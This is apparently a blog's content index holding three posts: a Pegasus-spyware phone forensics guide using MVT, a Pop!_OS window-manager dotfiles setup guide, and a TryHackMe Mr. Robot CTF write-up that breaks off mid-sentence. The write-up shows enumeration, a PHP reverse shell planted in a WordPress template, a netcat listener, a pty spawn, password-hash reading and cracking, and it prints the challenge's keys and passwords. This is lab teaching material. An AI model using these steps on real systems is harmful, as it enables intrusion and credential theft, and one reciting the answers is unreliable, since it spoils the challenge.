~/Documents/decrypted ~/Documents/0000[REDACTED] This command will take a long time, depending on the weight of the copy. Once the decryption is complete, it\u0026rsquo;s time to make an output folder:\nmkdir ~/Downloads/output_forensics After that, we are left with only one command that will perform a scan using a strix2 file and check whether the iPhone is infected with Pegasus or not.\nmvt-ios check-backup -i ~/Downloads/investigations/2021-07-18_nso/pegasus.strix2 -o ~/Downloads/output_forensics ~/Documents/decrypted Digital forensics on Android devices # Digital forensics on Android devices is much more complicated; MVT currently provides two methods.\nBy downloading and analyzing the APK files that are installed. By extracting Android backups and check for suspicious SMS messages. APK file check # To use the MVT option mvt-android, your Android device needs to be connected to Linux. You will need to turn on the USB debugging option on your phone.\nThen on the first connection, you will have to confirm the connection of the device on Android, so on Linux, we can create an output folder:\nmkdir ~/Downloads/output_forensics You can then run the following command:\nmvt-android download-apks -o ~/Downloads/output_forensics You can choose where you want to view the SHA256 Hash APKs extracted on VirusTotal . This can help identify malicious APK files (applications) on your Android device. We do this with the command:\nmvt-android download-apks -o ~/Downloads/output_forensics --virustotal Checking for malicious SMS messages # This method uses the MVT to check if your Android device is infected with malicious SMS. I assume you have already connected your device as in the instructions for APK files; now we run this command:\nadb backup com.android.providers.telephony We need to approve the backup on your phone and potentially enter your backup password. The backup will then be stored in a folder called backup.ab.\nThen we need to use Android Backup Extractor to convert the previously obtained file into a readable format. Java must be installed on the system!\nThen run the following commands:\njava -jar ~/Downloads/abe.jar unpack backup.ab backup.tar tar xvf backup.tar Android Backup Extractor will ask you for the password if the backup is encrypted.\nThen MVT checks whether malicious links are in SMS messages; we do it with the command:\nmvt-android check-backup -o sms . Using the \u0026ndash;iocs or \u0026ndash;i options we can specify the IOCs file.\nWhich files does mvt-ios create and then check ? # After the MVT has done analysing, the terminal will write you a Warning (suspicious file) if your device is infected with Pegasus. You will now see all the files that MVT has created and checked during the analysis.\n💵 [cache_files.json]\nThis JSON file creates the CacheFiles module. The module extracts records from all SQLite database files saved on a disk named ** Cache.db **. These databases usually contain data from iOS Internal URL caching.\nYou can use this module to see HTTP requests and responses. This is useful because we can see HTTP requests that are part of the \u0026ldquo;exploitation chain\u0026rdquo;, and they work by the iOS service trying to download a malicious file during the first phase of this request.\n📱 [calls.json]\nThis JSON file creates the Calls module. The module extracts records from the SQLite database located on /private/var/mobile/Library/CallHistoryDB/CallHistory.store data contains a list of all incoming and outgoing calls, including applications such as WhatsApp or Skype.\n💻 [chrome_favicon.json]\nThis JSON file creates the ChromeFavicon module. The module extracts records from the SQLite database located on /private/var/mobile/Containers/Data/Application/*/Library/Application Support/Google/Chrome/Default/Favicons, and serves to save favicons (small icons in your web browser tabs) for faster loading.\nFavicons can be hacked; you can see more about this topic at LINK .\n💻 [chrome_history.json]\nThis JSON file creates the ChromeHistory module. The module extracts records from the SQLite database located on /private/var/mobile/Containers/Data/Application/*/Library/Application Support/Google/Chrome/Default/History, which contains your Google Chrome web browser history.\n🤓 [contacts.json]\nThis JSON file creates the ** Contacts ** module. The module extracts records from the SQLite database located on /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb, which contains a list of your contacts.\n🦊 [firefox_favicon.json]\nThe FirefoxFavicon module created this JSON file. The module extracts records from the SQLite database located on /private/var/mobile/profile.profile/browser.db, and serves to save favicons (small icons in your web browser\u0026rsquo;s tabs) for faster loading.\n🦊 [firefox_history.json]\nThe FirefoxHistory module created this JSON file. The module extracts records from the SQLite database located at /private/var/mobile/profile.profile/browser.db contains your Firefox web browser history.\n📋 [id_status_cache.json]\nThis JSON file creates the IDStatusCache module. The module extracts records from the plist file located at /private/var/mobile/Library/Preferences/com.apple.identityservices.idstatuscache.plist which saves your Apple ID samples (this includes biometrics like Touch and Face ID).\n🤝 [interaction_c.json]\nThis JSON file creates the InteractionC module. The module extracts records from the SQLite database located at /private/var/mobile/Library/CoreDuet/People/interactionC.db, and contains details about user interactions with installed applications.\n📍 [locationd_clients.json]\nThis JSON file creates the LocationdClients module. The module extracts records from the plist file located at /private/var/mobile/Library/Caches/locationd/clients.plist, and it contains cached memory of applications that requested access to location services.\n🔷 [manifest.json]\nThe Manifest module created this JSON file. The module extracts records from the SQLite Manifest.db database created by iTunes during the backup and serves to tell the local backup where all the files are on the iOS device.\n💽 [datausage.json]\nThis JSON file creates the Datausage module. The module extracts records from the SQLite database located in /private/var/wireless/Library/Databases/DataUsage.sqlite. It contains the history of data usage by the processes used on the system.\n💻 [safari_browser_state.json]\nThis JSON file creates the SafariBrowserState module. The module extracts records from SQLite databases located on /private/var/mobile/Library/Safari/BrowserState.db or /private/var/mobile/Containers/Data/Application/*/Library/Safari/BrowserState.db , and contain a list of open tabs in the Safari web browser.\n💻 [safari_favicon.json]\nThis JSON file creates the SafariFavicon module. The module extracts records from SQLite databases located on /private/var/mobile/Library/Image Cache/Favicons/Favicons.db or /private/var/mobile/Containers/Data/Application/*/Library/Image Cache/Favicons/Favicons.db, and serves to save favicons (small icons in the tabs of your web browser) for faster loading.\n🔥 [safari_history.json]\nThis JSON file creates the SafariHistory module. The module extracts records from SQLite databases located on /private/var/mobile/Library/Safari/History.db or /private/var/mobile/Containers/Data/Application/*/Library/Safari/History.db , which contain search history.\n📝 [sms.json]\nThis JSON file creates a SMS module. The module extracts a list of SMS messages containing HTTP links from the SQLite database located at /private/var/mobile/Library/SMS/sms.db.\n📝 [sms_attachments.json]\nThis JSON file creates the SMSAttachments module. The module extracts details about attachments sent by SMS or iMessage from the same database used by the SMS module.\n📜 [version_history.json]\nThis JSON file creates the IOSVersionHistory module. The module extracts iOS update records from the analytics list files located on /private/var/db/analyticsd/Analytics-Journal-*.Ips.\n🕸️ [webkit_indexeddb.json]\nThis JSON file creates the WebkitIndexedDB module. The module extracts a list of files and folders located in /private/var/mobile/Containers/Data/Application/*/Library/WebKit/WebsiteData/IndexedDB, and contains IndexedDB files created by any application.\n🕸️ [webkit_local_storage.json]\nThis JSON file creates the WebkitLocalStorage module. The module extracts a list of file and folder names found in /private/var/mobile/Containers/Data/Application/*/Library/WebKit/WebsiteData/LocalStorage/, and contains files from internal storage created by any application.\n🕸️ [webkit_safari_view_service.json]\nThis JSON file creates the WebkitSafariViewService module. The module extracts a list of file and folder names found in /private/var/mobile/Containers/Data/Application/*/SystemData/com.apple.SafariViewService/Library/WebKit/WebsiteData/, and contains files cached by SafariVewService .\n🕸️ [webkit_session_resource_log.json]\nThis JSON file creates the WebkitSessionResourceLog module. The module extracts records from plist files named full_browsing_session_resourceLog.plist, and contains resource records loaded from various web pages visited.\n📞 [whatsapp.json]\nThis JSON file was created by the WhatsApp module. The module extracts a list of WhatsApp messages containing HTTP connections from the SQLite database located at /private/var/mobile/Containers/Shared/AppGroup/*/ChatStorage.sqlite.\nConclusion # Pegasus is one of the most dangerous tools for espionage, I disagree with the actions of the NSO Group company, and I think everyone has the right to privacy. Currently, the only protection against Pegasus might be a phone that is neither Android nor iOS. A good alternative is the Nokia 8110 4G with GerdaOS operating system. I recommend watching The Guardian\u0026rsquo;s interview with Edward Snowden on the subject of Pegasus.\nThank you for your time 💙 # ","date":"21 July 2021","permalink":"/blog/nso-pegasus-spyware/","section":"Blogs","summary":"🔍 NSO Pegasus Spyware 🔍 What is Pegasus Spyware ? # Over the weekend, news leaked that several authoritarian governments (including Mexico, Morocco and the UAE) used spying software developed by the Israeli company NSO Group .","title":"NSO Pegasus Spyware"},{"content":"","date":"21 July 2021","permalink":"/categories/privacy/","section":"Categories","summary":"","title":"Privacy"},{"content":" 🖥️ Pop! Linux configuration files 🖥️ These are my current dotfiles of Pop! Linux distribution OS.\nThe installation will help you create the same look like the pictures; here are the step-by-step instructions.\nSystem specifications:\nOS: Pop!_OS WM: BSPWM Keyboard Deamon: Sxhkd Bar: Polybar Compositor: Picom App Launcher: Rofi Terminal: Alacritty Shell: Oh-my-ZSH Shell theme: Powerlevel10k Text Editor: Vim-Airline Lockscreen: Slim and Slimlock Notifications: Dunst GTK Theme: Nordic_Dark Icon Theme: Flatery_Dark Cursor Theme: Oreo_Blue Font: Source_Code_Pro Browser: Firefox Browser Theme: Minimal_Functional_Fox Installation # To start making this look, I assume you have a freshly installed Pop! OS.\nIf you are interested in what an application does, Wikipedia will help you.\nRepository upgrade and system upgrade # sudo apt update sudo apt upgrade Installation of BSPWM Tilling Window Manager # First, we need to install a few necessary so-called dependencies that we need to proceed with the installation.\nInstallation of required dependencies: sudo apt install build-essential git vim xcb libxcb-util0-dev libxcb-ewmh-dev libxcb-randr0-dev libxcb-icccm4-dev libxcb-keysyms1-dev libxcb-xinerama0-dev libasound2-dev libxcb-xtest0-dev libxcb-shape0-dev Repository cloning: cd ~/Downloads git clone https://github.com/baskerville/bspwm.git Compiling and installing BSPWM: cd bspwm make sudo make install Copy BSPWM configuration files: mkdir ~/.config/bspwm cp examples/bspwmrc ~/.config/bspwm chmod +x ~/.config/bspwm/bspwmrc cd .. Installation of keyboard deamon # For example, we must use the so-called keyboard daemon to use keyboard shortcuts to open a terminal, another application, etc. It is a process that runs in the background and instructs BSPWM Tilling Window Manager what to do if someone presses a specific shortcut on the keyboard.\nIf you are interested in what a shortcut does according to my settings, the shortcut section will help you.\nRepository cloning: cd ~/Downloads git clone https://github.com/baskerville/sxhkd.git Compiling and installing sxhkd: cd sxhkd make sudo make install Copy sxhkd configuration files: mkdir ~/.config/sxhkd cp ../bspwm/examples/sxhkdrc ~/.config/sxhkd cd .. NOTE: If you change anything in the sxhkdrc file, pay attention to which terminal you are set to; if you are using a regular Pop OS! terminal, you need to change the OS to gnome-terminal under the terminal emulator. Installation of Polybar # Installation of required dependencies: sudo apt install cmake cmake-data pkg-config python3-sphinx libcairo2-dev libxcb1-dev libxcb-util0-dev libxcb-randr0-dev libxcb-composite0-dev python3-xcbgen xcb-proto libxcb-image0-dev libxcb-ewmh-dev libxcb-icccm4-dev libxcb-xkb-dev libxcb-xrm-dev libxcb-cursor-dev libasound2-dev libpulse-dev libjsoncpp-dev libmpdclient-dev libcurl4-openssl-dev libnl-genl-3-dev Repository cloning: cd ~/Downloads git clone --recursive https://github.com/polybar/polybar Compilation and installation of polybar: cd polybar mkdir build cd build cmake .. make -j$(nproc) sudo make install Installation of Picom # Installation of required dependencies: sudo apt install meson libxext-dev libxcb1-dev libxcb-damage0-dev libxcb-xfixes0-dev libxcb-shape0-dev libxcb-render-util0-dev libxcb-render0-dev libxcb-randr0-dev libxcb-composite0-dev libxcb-image0-dev libxcb-present-dev libxcb-xinerama0-dev libpixman-1-dev libdbus-1-dev libconfig-dev libgl1-mesa-dev libpcre2-dev libevdev-dev uthash-dev libev-dev libx11-xcb-dev Repository cloning: cd ~/Downloads git clone https://github.com/ibhagwan/picom.git Making picom with Ninja: cd picom git submodule update --init --recursive meson --buildtype=release . build ninja -C build Installation of picom compositor: sudo ninja -C build install cd .. Installation of Rofi # sudo apt install rofi Installation of Alacritty terminal # sudo apt install alacritty Cloning this repository: cd ~/Downloads git clone https://github.com/lukapiplica/dots.git Setting up an alacritty theme: mkdir ~/.config/alacritty cp dots/alacritty/alacritty.yml ~/.config/alacritty/ NOTE: If you get error: GLSL 3.30 is not supported, do this: nano /usr/share/applications/com.alacritty.Alacritty.desktop Change Exec=alacritty into Exec=bash -c \u0026quot;LIBGL_ALWAYS_SOFTWARE=1 alacritty\u0026quot;.\nNOTE: After this step, you are ready to log in to BSPWM; first, you need to log out of the current desktop interface; then, click on the ⚙️ icon in the lower right corner and select BSPWM. Installation of fonts # cd ~/Downloads cd dots sudo cp -r Source_Code_Pro /usr/share/fonts fc-cache -v Setting the wallpaper # Installation of Feh program: sudo apt install feh Moving wallpapers: mkdir ~/Wall cp -r ~/Downloads/dots/Wallpapers/ ~/Wall Setting the wallpaper: echo \u0026#39;feh --bg-fill $HOME/Downloads/dots/Wallpapers/wallpaper2.jpeg\u0026#39; \u0026gt;\u0026gt; ~/.config/bspwm/bspwmrc Configuration of polybar # mkdir ~/.config/polybar cd ~/Downloads/dots/polybar cp * -r ~/.config/polybar echo \u0026#39;~/.config/polybar/./launch.sh\u0026#39; \u0026gt;\u0026gt; ~/.config/bspwm/bspwmrc cd fonts sudo cp * /usr/share/fonts/truetype/ Installation of Oh-My-ZSH # sudo apt install zsh sh -c \u0026#34;$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh) Installation of Powerlevel10k # Repository cloning: git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k After cloning, we have to set this topic in the ~/.zshrc file; we do this by typing in the .zshrc file with this command ZSH_THEME=\u0026quot;powerlevel10k/powerlevel10k\u0026quot;\nWe type in the terminal:\np10k configure And let\u0026rsquo;s follow the instructions in the terminal to make the theme we want.\nInstallation of Vim theme # mkdir -p ~/.vim/colors cd ~/Downloads cp dots/nord.vim ~/.vim/colors Cloning a Vim Airline theme: cd ~/Downloads git clone https://github.com/vim-airline/vim-airline.git cd vim-airline cp * -r ~/.vim echo \u0026#39;colorscheme nord\u0026#39; \u0026gt;\u0026gt; ~/.vimrc echo \u0026#39;let g:airline_theme=\u0026#39;base16\u0026#39;\u0026#39; \u0026gt;\u0026gt; ~/.vimrc Setting up rofi theme # mkdir -p ~/.config/rofi/themes cp ~/Downloads/dots/nord.rasi ~/.config/rofi/themes rofi-theme-selector Rofi Theme Selector will show us some of the themes. To select our theme go to Nord theme click Enter, and then to set it forever, press Alt + a nano ~/.config/sxhkd/sxhkdrc Opens the nano text editor in the terminal and we have to change dmenu ** ** to ** rofi -show drun` Installation of Slim and Slimlock # sudo apt instll slim libpam0g-dev libxrandr-dev libfreetype6-dev libimlib2-dev libxft-dev sudo dpkg-reconfigure gdm3 Note: If we get a menu, we have to choose Slim as an option. To set the theme: cd ~/Downloads/dots sudo cp slim.conf /etc \u0026amp;\u0026amp; sudo cp slimlock.conf /etc sudo cp default /usr/share/slim/themes Various tools # We have successfully achieved the look of this operating system; now, we are installing several programs from the pictures.\nInstallation of tty-clock # sudo apt-get install tty-clock Installation of CAVA Audio Visualizer # sudo add-apt-repository ppa:hsheth2/ppa sudo apt-get update sudo apt-get install cava Installation of htop # sudo apt-get install htop Installation of cmatrix # sudo apt-get install cmatrix Installation of sxiv # sudo apt-get install sxiv Installation of Ranger # sudo apt-get install ranger Installation of pfetch # cd ~/Downloads git clone https://github.com/dylanaraps/pfetch.git sudo install pfetch/pfetch /usr/local/bin/ ls -l /usr/local/bin/pfetch Installation of chafa # cd ~/Downloads git clone https://github.com/hpjansson/chafa.git cd chafa ./autogen.sh make sudo make install Installation of snake game # sudo apt install python3-pip python3 -m pip install -U pygame --user cd ~/Downloads git clone https://github.com/Unixado/Snake.git cd Snake python src/game.py Installation of lollypop # sudo add-apt-repository ppa:gnumdk/lollypop sudo apt install lollypop Installation of Minimal Functional Fox # sh -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/mut-ex/minimal-functional-fox/master/install.sh)\u0026#34; Set up a Firefox theme cp -r ~/Downloads/dots/.firefoxthemes ~/ Then open Firefox and go to preferences, then to Home and where it says Homepage and new windows we select Custom URLs ..., below we write this: file:///home/*YOUR USERNAME*/.firefoxthemes/startpage/Startpage/index.html Restart Firefox Installation of GTK Theme # Installation of Lxappearance # sudo apt-get install lxappearance Installation of Nordic Dark theme # Theme link: https://www.gnome-look.org/p/1267246/ Download the zip file, extract it and insert it in Lxappearance.\nInstallation of Flattery Dark theme for icons # Theme link: https://www.gnome-look.org/s/Gnome/p/1332404 Download the zip file, extract it and insert it in Lxappearance.\nInstallation of Oreo Blue cursor theme # Theme link: https://www.gnome-look.org/s/Gnome/p/1360254/ Download the zip file, extract it and insert it in Lxappearance.\nWikipedia # Once we have made this BSPWM configuration, it is time to clarify what each application does. Within the ~/.config/ directory you can find all the files you need to run BSPWM.\n🧠 [BSPWM]\nBSPWM is a tiling window manager that, unlike other desktop interfaces, each new window opens according to an algorithm.\nIf we have, for example, two windows, they will be open in full screen, and they cannot be located one over the other, such as in Windows or GNOME interfaces. Theoretically, it effectively uses the space on the screen so that the entire screen is filled. If we run out of space on the first desktop, we can switch to the second desktop using the keyboard shortcut or mouse and continue using this operating system.\n⌨️ [SXHKD]\nSXHKD is a keyboard daemon. It works for us as a background process and tells BSPWM which application to open if the user presses a specific shortcut on the keyboard.\n🍫 [Polybar]\nPolybar is our status bar at the top of our desktop.\nIt serves us to display notifications, date and time, internet, battery, shutdown and restart menu of the operating system and most important workspaces from BSPWM.\n📚 [Picom]\nPicom is a compositor; it serves us as a process that sets rounded edges on every application we open.\n🤓 [Rofi]\nRofi is a process that opens up other applications, most helpful in running GTK applications (user interface applications).\n💻 [Alacritty] terminal.\nAlacritty serves as a terminal emulator, i.e. a replacement for the standard GNOME terminal.\nWe use it mainly because it gives us the ability to achieve better looks by editing its config files.\n🐚 [Oh-My-ZSH] shell.\nOh-My-ZSH is a framework that makes it easier for us to manage ZSH configurations.\nIn this case, it is mostly used to add topics to a terminal that has a ZSH shell.\nZSH (Zshell) was chosen because it is newer, and most of the updates from other Linux distributions are already moving to it compared to Bash shell.\nWe used the Powerlevel10k configuration to set the themes. 📋 [Vim] text editor\nAs many people use notepad on Windows operating systems, we use nano and Vim.\nThe Nano text editor is much easier to use, while the Vim is made more for developers because of its shortcuts.\nVim Airline is a theme that gives us a different look than a regular Vim. 📺 [Slim] lockscreen\nSlim is our lock screen.\nSlimlock is the theme that we used for the lock screen.\n💬 [Dunst] notifications.\nDunst is a process that runs in the background, and its primary purpose is to display notifications on the status bar (Polybar).\nThe advantage of dunst is that it provides the ability to code themes for appearance and many other functions such as. Which notifications to display, etc.\n🕶️ [Nordic Dark] GTK theme.\nNordic Dark is a GTK theme (theme for user interface applications) that gives us a dark look at applications with a user interface.\n🔷 [Flattery Dark] icon theme.\nThe name itself says that applications with a user interface mostly have icons that we can click with the mouse; this theme gives us a different look to the icons.\n🔵 [Oreo Blue] cursor theme.\nThis theme gives us a blue cursor look, it was inserted just for the looks and because it matches all the other colours of this operating system.\n🔤 [Source Code Pro] font.\nFont of this operating system.\n🔥🦊 [Firefox] web browser.\nI use Firefox because it is one of the best privacy-oriented web browsers, in my opinion.\n🦊 [Minimal Functional Fox] firefox theme.\nThis topic is here mainly for appearance but also because it is minimal.\n⏰ tty-clock\nTty-clock is an application that has the purpose of showing the time and date in the terminal.\n🎚️ CAVA audio visualizer.\nCava is our application that serves as an audio visualizer.\n📈 HTop\nThe HTop application shows which processors are currently running and how much RAM they are taking in, and many other things. Think of HTop as a Task Manager in the Windows operating system.\n😎 CMatrix\nCMatrix is an application that is here just for looks, and its purpose is to print some text in an open terminal that aims to give a display of hacking from the Matrix movie.\n🖼️ SXIV\nSXIV is an image viewer application that is an application that opens images to us.\n🤠 Ranger\nRanger is an application that allows us to see and access all files on the computer in the terminal.\n🗄️ Pfetch\nThe purpose of the Pfetch application is to show which operating system we use, which laptop/computer we have, which is the current version of the kernel, how much uptime we currently have, how many packets we have and how much RAM we have.\n⚙️ Chafa\nChafa is an application that prints an image to use in the terminal, thus achieving a retro/ASCII look of an image.\n🐍 Snake\nIn this case, the Snake app is an old snake game from the Nokia 3310 phone that has been slightly modified in terms of colours and is adapted to be played in the terminal.\n🍭 Lollypop\nLollypop is a music app, we play songs through it.\nShortcuts # As super we use the Windows key on the keyboard. Super is the most important key on our keyboard because we use it to give instructions to the SXHKD keyboard daemon.\nKeyboard # Keys Action super + enter Opens terminal super + space Opens Rofi through which we open GTK applications super + escape Reloads SXHKD and its configuration files super + alt + r Restarts the BSPWM Tiling Window Manager super + w Shuts down the current application super + [1-0] Changes the current work space super + g It changes the current window that is smaller to the area of the larger window, while the larger window puts it in the position of the smaller one super + m Opens the application across the entire desktop super + [h,j,k,l] Moves focus to another window super + alt + [h,j,k,l] Moves the windows outward super + alt + shift + [h,j,k,l] Moves the windows inwards super + s Puts windows in the so-called float mode, an option where we can put a window on the window as in Windows operating systems super + ctrl + [arrow keys] Moves the float windows Thanks you for your time 💙 # ","date":"19 July 2021","permalink":"/blog/pop-os-nordic/","section":"Blogs","summary":"🖥️ Pop! Linux configuration files 🖥️ These are my current dotfiles of Pop! Linux distribution OS.\nThe installation will help you create the same look like the pictures; here are the step-by-step instructions.","title":"[BSPWM] Pop OS Nordic"},{"content":" 🤖 TryHackMe Mr. Robot CTF 🤖 Can we hack Mr. Robot CTF? This virtual machine is rated medium and will teach us many useful things.\nThe instructions will help achieve the same answers; there are step-by-step instructions.\nUsed programs:\nOpenVPN NMAP GoBuster Netcat Instructions # To start hacking this virtual machine, we must first connect to TryHackMe OpenVPN and run the machine in Task 2.\nI assume your local virtual machine is with the Kali Linux operating system.\nEstablishing a connection via OpenVPN # First, we need to download the OpenVPN file from TryHackMe that they give you. Then turn on the terminal in the directory where you downloaded the OpenVPN file. Connection is made using:\nsudo openvpn *NAME_OF_YOUR_FILE*.ovpn Network enumeration # Firstly we need to look at which ports are open. The more we know about the system, the better. In this case, we use Nmap to scan the network.\nNmap scan # kali@kali:~/Desktop$ nmap *IP_ADDRESS* -A Result of Nmap scan # kali@kali:-/Desktop$ nmap 10.10.51.194 -A Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 18:35 CEST Nmap scan report for 10.10.38.44 Host is up (0.095s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn\u0026#39;t have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn\u0026#39;t have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.90 seconds As we can see, we have port 80 open which tells us that this is a website on the HTTP protocol.\nInstallation of seclists # sudo apt install seclists After this command seclists will be installed in the /usr/share/seclists/ directory.\nDirectory enumeration on a web server using gobuster # kali@kali:~/Desktop$ gobuster dir -u http://10.10.51.194/ -w /usr/share/seclists/Discovery/Web-Content/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.51.194/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/05/23 18:27:45 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 213] /.htaccess (Status: 403) [Size: 218] /.htpasswd (Status: 403) [Size: 218] /0 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/0/] /Image (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/Image/] /admin (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/admin/] /atom (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/atom/] /audio (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/audio/] /blog (Status: 301) [Size: 233] [--\u0026gt; http://10.10.51.194/blog/] /css (Status: 301) [Size: 232] [--\u0026gt; http://10.10.51.194/css/] /dashboard (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-admin/] /favicon.ico (Status: 200) [Size: 0] /feed (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /images (Status: 301) [Size: 235] [--\u0026gt; http://10.10.51.194/images/] /image (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/image/] /index.php (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/] /index.html (Status: 200) [Size: 1188] /js (Status: 301) [Size: 231] [--\u0026gt; http://10.10.51.194/js/] /intro (Status: 200) [Size: 516314] /license (Status: 200) [Size: 309] /login (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-login.php] /page1 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/] /phpmyadmin (Status: 403) [Size: 94] /readme (Status: 200) [Size: 64] /rdf (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/rdf/] /robots (Status: 200) [Size: 41] /robots.txt (Status: 200) [Size: 41] /rss (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /rss2 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /sitemap (Status: 200) [Size: 0] /sitemap.xml (Status: 200) [Size: 0] /video (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/video/] /wp-admin (Status: 301) [Size: 237] [--\u0026gt; http://10.10.51.194/wp-admin/] /wp-content (Status: 301) [Size: 239] [--\u0026gt; http://10.10.51.194/wp-content/] /wp-config (Status: 200) [Size: 0] /wp-includes (Status: 301) [Size: 240] [--\u0026gt; http://10.10.51.194/wp-includes/] /wp-cron (Status: 200) [Size: 0] /wp-links-opml (Status: 200) [Size: 227] /wp-load (Status: 200) [Size: 0] /wp-login (Status: 200) [Size: 2606] /wp-mail (Status: 500) [Size: 3064] /wp-settings (Status: 500) [Size: 0] /wp-signup (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-login.php?action=register] /xmlrpc (Status: 405) [Size:42] =============================================================== 2021/05/23 18:40:33 Finished =============================================================== Finding the first key # After enumeration, we can see more directories located on this web server. If we look at TryHackMe Hint for the first key, we can see that our hint is robots.txt. I guess this hint /robots directory are related. Next to them, I\u0026rsquo;m interested in /wp-login; I think it\u0026rsquo;s WordPress.\nEntering the page Enter the obtained IP address into your web browser:\nBut if we type in our link /robots.txt (IP_ADDRESS/robots.txt), we can see that it throws out the first key, which is in .txt format.\nWe found two files, one fsociety.dic and key-1-of-3.txt. The first file looks like a dictionary file.\nDownloading the first key # We can see the first key by entering the page (http://IP_ADDRESS/key-1-of-3.txt), but we can also download it using the curl command.\ncurl -s http://IP_ADDRESS/key-1-of-3.txt Result # kali@kali:~/Desktop$ curl -s http://10.10.51.194/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9 First key: 073403c8a58a1f80d943455fb30724b9\nFinding the second key # HINT: White coloured text.\nIf we go back to gobuster we can see that we had WordPress directories. I am specifically interested in:\n/login (Status: 302) /wp-content (Status: 301) /admin (Status: 301) /wp-login (Status: 200) /license (Status: 200) /wp-includes (Status: 301) As we can see, the /license directory is with 200 status. Status 200 tells us that the page is active. Curl is our best friend in this case.\nCurl command # curl -s http://IP_ADDRESS/license | tr -d \u0026#34;\\n\u0026#34; Result # kali@kali:~/Desktop$ curl -s http://10.10.51.194/license | tr -d \u0026#34;\\n\u0026#34; what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something? ZWxsaW90OkVSMjgtMDY1Mgo= The specific text is ZWxsaW90OkVSMjgtMDY1Mgo= looks like base64.\nDecrypting Base64 # The command we will use is:\necho \u0026#34;ZWxsaW90OkVSMjgtMDY1Mgo=\u0026#34; | base64 -d Base64 decryption result # kali@kali:~/Desktop$ echo \u0026#34;ZWxsaW90OkVSMjgtMDY1Mgo=\u0026#34; | base64 -d elliot:ER28-0652 We got the username and password, I guess, from WordPress.\nInteresting fact: The code is a reference to Elliot\u0026rsquo;s number from the identification card at work and appears in the series. WordPress enumeration # It\u0026rsquo;s time to try to sign up on WordPress:\nThe first step is to go to:\nhttp://IP_ADDRESS/wp-login After logging in on the page immediately in the lower-left corner, we see that the WordPress version is 4.3.1. This is an old version of WordPress.\nWe find two users, of which Elliot (we) are the administrator.\nWe can see that this old version of WordPress is vulnerable to PHP reverse shell. LINK OF THE SCRIPT Since we are an administrator, we need to go to Appearance.\nWe have to replace the code with the script on the 404 PHP template.\nNote: Pay attention to the IP address in the code; here, we have the local IP address, ie. The IP address of our computer. We can check the local IP address with ifconfig. PHP reverse shell via netcat # After we have replaced and changed the IP address in the script, we will run Netcat on the port that establishes a connection to us via the script. We do this with the following command:\nnc -nlvp 1234 After that, we have to go to the http://IP_ADDRESS/404.php this link in the web browser.\nAs we can see, we opened the shell in the terminal. Netcat got the connection.\nWe will now check which files are in the /home/robot directory. We do this with the command:\nls -l /home/robot We now know the location of the second key:\n$ ls -l /home/robot total 8 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5 The problem is that we are not robot user on this machine at all. We check this with the whoami command.\n$ whoami daemon The only file we can see is password.raw-md5. Let\u0026rsquo;s see what\u0026rsquo;s in this file.\n$ cat /home/robot/password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b Decrypting MD5 Hash # It\u0026rsquo;s MD5 Hash. A hash is a mathematical function that cannot be returned after it has done its job. This is good for storing passwords, but MD5 is an old algorithm and easy to crack.\nWe will first look at whether this hash can be cracked online to save time. LINK As we can see on the link above, it can. The password is abcdefghijklmnopqrstuvwxyz\nNow we need to log in as a robot user. We do this with the following command:\nsu - robot But there is a problem:\n$ su - robot su: must be run from a terminal Python shell # This can be fixed with Python. Firstly we need to check if Python is installed at all.\n$ which python /usr/bin/python Let\u0026rsquo;s make a shell with Python. We can do that with this command:\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/sh\u0026#34;)\u0026#39; As you can see, the terminal didn\u0026rsquo;t show any errors, which means that we successfully created a shell in Python.\nLet\u0026rsquo;s sign in as a user robot.\n$ su - robot su - robot Password: abcdefghijklmnopqrstuvwxyz $ whoami whoami robot $ As we can see, we are logged in as a robot user.\nSecond key # To view the second key, we need to use the cat command:\ncat key-2-of-3.txt Result:\n$ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 Second key: 822c73956184f694993bede3eb39f959\nFinding the third key # HINT: NMAP\nIf we go back to the Nmap result we got at the 